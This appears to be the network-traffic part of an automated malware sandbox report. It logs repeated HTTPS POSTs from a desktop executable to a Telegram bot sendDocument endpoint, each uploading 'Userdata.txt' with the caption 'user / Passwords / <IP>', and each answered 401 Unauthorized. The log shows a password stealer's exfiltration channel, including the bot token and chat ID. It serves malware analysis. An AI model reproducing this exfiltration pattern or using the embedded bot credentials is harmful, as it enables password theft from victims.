                                                                                                          Date: Fri, 10 Jan 2025 20:25:42 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:25:42 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.849785149.154.167.2204435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:25:43 UTC272OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31f9ee600d70
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 20:25:43 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 39 65 65 36 30 30 64 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31f9ee600d70Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:25:43 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:25:43 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:25:43 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.849802149.154.167.2204435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:25:45 UTC272OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd321822276aaf
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 20:25:45 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 38 32 32 32 37 36 61 61 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd321822276aafContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:25:46 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:25:46 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:25:46 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.849814149.154.167.2204435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:25:47 UTC272OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd322b49d64871
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 20:25:47 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 62 34 39 64 36 34 38 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd322b49d64871Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:25:48 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:25:47 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:25:48 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.849826149.154.167.2204435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:25:49 UTC296OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32468ff34b56
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 20:25:49 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 36 38 66 66 33 34 62 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32468ff34b56Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:25:49 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:25:49 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:25:49 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.849838149.154.167.2204435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:25:51 UTC296OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3256e00e1ca8
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 20:25:51 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 36 65 30 30 65 31 63 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3256e00e1ca8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:25:51 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:25:51 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:25:51 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.849862149.154.167.2204435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:25:54 UTC272OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3282309ea77b
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 20:25:54 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 38 32 33 30 39 65 61 37 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3282309ea77bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:25:54 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:25:54 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:25:54 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.849913149.154.167.2204435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:26:02 UTC296OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32daaef8b599
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 20:26:02 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 61 61 65 66 38 62 35 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32daaef8b599Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:26:02 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:26:02 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:26:02 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.849939149.154.167.2204435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:26:05 UTC272OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd33052afb8cac
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 20:26:05 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 30 35 32 61 66 62 38 63 61 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd33052afb8cacContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:26:06 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:26:06 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:26:06 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.849981149.154.167.2204435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:26:12 UTC296OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd33517e971c7f
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 20:26:12 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 35 31 37 65 39 37 31 63 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd33517e971c7fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:26:12 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:26:12 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:26:12 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.849992149.154.167.2204435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:26:13 UTC272OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3367b73ade45
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
